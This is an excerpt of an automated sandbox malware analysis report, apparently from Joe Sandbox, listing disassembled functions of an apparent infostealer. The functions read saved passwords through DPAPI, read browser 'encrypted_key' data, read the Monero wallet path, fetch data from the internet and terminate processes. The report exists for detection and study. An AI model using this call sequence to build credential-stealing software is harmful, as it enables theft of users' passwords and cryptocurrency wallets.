                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 30afe74b5ab37d4065d2ab3191cab44ec6f7af091d7f3d148f32cc2341bbc1b4
                            • Instruction ID: 5656e1be906a42d09d2d985eb9ef727698726ddc08981d2e97739c3c936591bb
                            • Opcode Fuzzy Hash: 30afe74b5ab37d4065d2ab3191cab44ec6f7af091d7f3d148f32cc2341bbc1b4
                            • Instruction Fuzzy Hash: DC418F7191151C9BCB25EB64DC49AED73B4FF48300F4489A9FA1A93251EBB09F858FB0
                            APIs
                              • Part of subcall function 00D677D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D67805
                              • Part of subcall function 00D677D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00D6784A
                              • Part of subcall function 00D677D0: StrStrA.SHLWAPI(?,Password), ref: 00D678B8
                              • Part of subcall function 00D677D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D678EC
                              • Part of subcall function 00D677D0: HeapFree.KERNEL32(00000000), ref: 00D678F3
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D67A90
                            • lstrcat.KERNEL32(00000000,?), ref: 00D67ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 00D67ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 00D67AF0
                            • wsprintfA.USER32 ref: 00D67B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D67B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D67B47
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D67B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 65383513fd79697e34d3a8bc91d8adc2b211fd684a8d34000d9375760c295376
                            • Instruction ID: b1531e2b9d17a95bcc6102c78c5304e34812f0002c68c18fe1497060419fea80
                            • Opcode Fuzzy Hash: 65383513fd79697e34d3a8bc91d8adc2b211fd684a8d34000d9375760c295376
                            • Instruction Fuzzy Hash: 9C318572A1421CAFCB10DBACDC44DAFB7B9EB84718F19451AE50993310DB71E945EB70
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D7820C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D78243
                            • lstrlen.KERNEL32(00000000), ref: 00D78260
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D78297
                            • lstrlen.KERNEL32(00000000), ref: 00D782B4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D782EB
                            • lstrlen.KERNEL32(00000000), ref: 00D78308
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D78337
                            • lstrlen.KERNEL32(00000000), ref: 00D78351
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D78380
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: badab66982e0ad6ee9eb59a28580534b6b565e94c5e70ac7205eefc21ba7f7d7
                            • Instruction ID: fb7febe791becb51c85ae5d05e9a6e28b9df3723a55419e29c95e7ee48dcfcf9
                            • Opcode Fuzzy Hash: badab66982e0ad6ee9eb59a28580534b6b565e94c5e70ac7205eefc21ba7f7d7
                            • Instruction Fuzzy Hash: D4518C71A416029BDB10DF78D858A6AB7B8FF44740F198515ED0ADB244EB30ED50DBF0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D67805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00D6784A
                            • StrStrA.SHLWAPI(?,Password), ref: 00D678B8
                              • Part of subcall function 00D67750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D6775E
                              • Part of subcall function 00D67750: RtlAllocateHeap.NTDLL(00000000), ref: 00D67765
                              • Part of subcall function 00D67750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D6778D
                              • Part of subcall function 00D67750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00D677AD
                              • Part of subcall function 00D67750: LocalFree.KERNEL32(?), ref: 00D677B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D678EC
                            • HeapFree.KERNEL32(00000000), ref: 00D678F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00D67A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: fc373c78cd1964a3cf8e9390d9baae74dae97d2ab1b0c482aec388678e110057
                            • Instruction ID: 494fdd43832906fde0ac174a9cd5f66d7e8e7941228725c7666514612e0350df
                            • Opcode Fuzzy Hash: fc373c78cd1964a3cf8e9390d9baae74dae97d2ab1b0c482aec388678e110057
                            • Instruction Fuzzy Hash: C2712EB1D0421DABDB10DF95DC80ADEB7F8FF49304F14456AE509A7200EB75AA89CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00D74F39), ref: 00D84545
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D8454C
                            • wsprintfW.USER32 ref: 00D8455B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00D845CA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00D845D9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 00D845E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                            • String ID: %hs
                            • API String ID: 885711575-2783943728
                            • Opcode ID: 72243faaaa6968133ff0c31608f3b166e98fd25571ca57b51351613448cbad65
                            • Instruction ID: 2f6114340cac753fbe37cfa944ee91c2345195a3741fc1b2b62fdfbde371bb14
                            • Opcode Fuzzy Hash: 72243faaaa6968133ff0c31608f3b166e98fd25571ca57b51351613448cbad65
                            • Instruction Fuzzy Hash: 43314F72A04209BBEB10EBE4DC49FDE7778FF45700F10405AFA05E7190EBB0AA458BA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D61135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D6113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00D61159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00D61173
                            • RegCloseKey.ADVAPI32(?), ref: 00D6117D
                            Strings
                            • wallet_path, xrefs: 00D6116D
                            • SOFTWARE\monero-project\monero-core, xrefs: 00D6114F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: f1c077b7558f329eeb59d8033986541f9e94782a9fde13db61f5c7210d7e07d2
                            • Instruction ID: 06a096ed8ab48afc83c0f419f4fbb0208d6bfbf8030f3c5dbf42db43761b1a02
                            • Opcode Fuzzy Hash: f1c077b7558f329eeb59d8033986541f9e94782a9fde13db61f5c7210d7e07d2
                            • Instruction Fuzzy Hash: EFF0907964030DFFEB009BE5AC4EFEA7B7CEB04755F000155FE05E2290E6B05A4897A0
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 00D69E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 00D69E42
                            • LocalAlloc.KERNEL32(00000040), ref: 00D69EA7
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            • lstrcpy.KERNEL32(00000000,00D94C48), ref: 00D69FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: ac5275a0df22a965eda1de020c1d966d8ef2e5cf495645eb9ef4a86413e5ac65
                            • Instruction ID: 868fb5a0a2f98d1aaffc470abf45acd9249ab57de893cac45900b40ee29be94a
                            • Opcode Fuzzy Hash: ac5275a0df22a965eda1de020c1d966d8ef2e5cf495645eb9ef4a86413e5ac65
                            • Instruction Fuzzy Hash: 2E51A171A512099FDB10EFA8DC51BAEB7B8EF50314F194025F949EB241DBB0ED058BB0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D6565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D65661
                            • InternetOpenA.WININET(00D8CFEC,00000000,00000000,00000000,00000000), ref: 00D65677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00D65692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00D656BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 00D656E1
                            • InternetCloseHandle.WININET(?), ref: 00D656FA
                            • InternetCloseHandle.WININET(00000000), ref: 00D65701
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: a75d43858d9061c754ea562c09ba2820507de7e3a100b31fc8a6b0281f7e80a7
                            • Instruction ID: d190d68ca9b39c6ba8e69d048a0674c491452fc4cf97d06cac0ab86096722eb6
                            • Opcode Fuzzy Hash: a75d43858d9061c754ea562c09ba2820507de7e3a100b31fc8a6b0281f7e80a7
                            • Instruction Fuzzy Hash: D4418370A00609DFDB14CF59ED44F9AB7B5FF48304F18806EE5189B2A5E7719981CFA4
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00D84759
                            • Process32First.KERNEL32(00000000,00000128), ref: 00D84769
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D8477B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D8479C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D847AB
                            • CloseHandle.KERNEL32(00000000), ref: 00D847B2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D847C0
                            • CloseHandle.KERNEL32(00000000), ref: 00D847CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: b2cd81c9e0a9b04729029e1476f263a345c9599bb4734e14e9114642d87d5fae
                            • Instruction ID: 560e27dcb186855fda022ddbe57580098696247f606409752f8456d6964ccd88
                            • Opcode Fuzzy Hash: b2cd81c9e0a9b04729029e1476f263a345c9599bb4734e14e9114642d87d5fae
                            • Instruction Fuzzy Hash: 6401D87160131DABE7206B749C8DFEA77BCEB49756F041186F905D1090EFB48D809BB0
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D78435
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7846C
                            • lstrlen.KERNEL32(00000000), ref: 00D784B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D784E9
                            • lstrlen.KERNEL32(00000000), ref: 00D784FF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7852E
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D7853E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 204528d3ae05207498a2901c2afbbf7e2ca5455f3831c87c3a709087f3112c84
                            • Instruction ID: 64df4ee8bb46f7d8694bdcc0b5b815f0c67667e746f687f9fc09e42edb433528
                            • Opcode Fuzzy Hash: 204528d3ae05207498a2901c2afbbf7e2ca5455f3831c87c3a709087f3112c84
                            • Instruction Fuzzy Hash: EE5181716406069FCB20DF68D888A5AB7F9EF48700F18C45AEC4ADB245EF70D9419B70
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00D82925
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D8292C
                            • RegOpenKeyExA.ADVAPI32(80000002,00BEB9D8,00000000,00020119,00D828A9), ref: 00D8294B
                            • RegQueryValueExA.ADVAPI32(00D828A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00D82965
                            • RegCloseKey.ADVAPI32(00D828A9), ref: 00D8296F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 3b222da157eb1c7fdf63c6a9218307d336680dc5b022e27eafcbed8222e98937
                            • Instruction ID: a1f21719849f4f442b59aa8ed2c4c9c8c7a449a454e7e952eded584708e7088a
                            • Opcode Fuzzy Hash: 3b222da157eb1c7fdf63c6a9218307d336680dc5b022e27eafcbed8222e98937
                            • Instruction Fuzzy Hash: 66012F75600318AFE310EBA5EC59EFB7BBCEB49745F140099FE45D7240EA7159088BA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00D82895
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D8289C
                              • Part of subcall function 00D82910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00D82925
                              • Part of subcall function 00D82910: RtlAllocateHeap.NTDLL(00000000), ref: 00D8292C
                              • Part of subcall function 00D82910: RegOpenKeyExA.ADVAPI32(80000002,00BEB9D8,00000000,00020119,00D828A9), ref: 00D8294B
                              • Part of subcall function 00D82910: RegQueryValueExA.ADVAPI32(00D828A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00D82965
                              • Part of subcall function 00D82910: RegCloseKey.ADVAPI32(00D828A9), ref: 00D8296F
                            • RegOpenKeyExA.ADVAPI32(80000002,00BEB9D8,00000000,00020119,00D79500), ref: 00D828D1
                            • RegQueryValueExA.ADVAPI32(00D79500,00BFDDA8,00000000,00000000,00000000,000000FF), ref: 00D828EC
                            • RegCloseKey.ADVAPI32(00D79500), ref: 00D828F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 7994869a461fa49fb01fff53702748ffc15a6c214658ec00f6f5f269c74f3cad
                            • Instruction ID: 41da6611c6f4c0ca247e937c5a4156ff8c834a1c0735a7d548eff04f49f55076
                            • Opcode Fuzzy Hash: 7994869a461fa49fb01fff53702748ffc15a6c214658ec00f6f5f269c74f3cad
                            • Instruction Fuzzy Hash: E301A27164020CBBEB10ABB9EC4AEBA777CEB44355F00015AFE08D2250DA71594597F0
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 00D6723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00D67279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D67280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00D672C3
                            • HeapFree.KERNEL32(00000000), ref: 00D672CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00D67329
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 90aec6061cbc7dfe1d6688fd400d1bb168925178acc0032d84bc1bea01aed41f
                            • Instruction ID: c638e5e549e559b09fbaf589f61e72dfeb220285c41822263b8139838a2dd5ca
                            • Opcode Fuzzy Hash: 90aec6061cbc7dfe1d6688fd400d1bb168925178acc0032d84bc1bea01aed41f
                            • Instruction Fuzzy Hash: E9415F717057099BDB20CF69DC84BAAB3E8FB89319F18456AEC5DC7310E631E9509B60
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00D69CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00D69CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D69D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: c279162533379f609f009abb0ca5cbfad7aef1dd3a19a0b5db69ee1cbb2eeb79
                            • Instruction ID: 72a08f97faa01d8d3ee8be0598d865a0554f81506f9bbccc7254fc5fee1eefed
                            • Opcode Fuzzy Hash: c279162533379f609f009abb0ca5cbfad7aef1dd3a19a0b5db69ee1cbb2eeb79
                            • Instruction Fuzzy Hash: F241C371A016099BCF21EFA8DDA16EEB7B8EF54304F0D4468E915A7252DA70ED05CBB0
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7EA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7EA53
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7EA61
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7EA7A
                            • lstrcat.KERNEL32(?,00BF8FA0), ref: 00D7EA8D
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7EA9F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
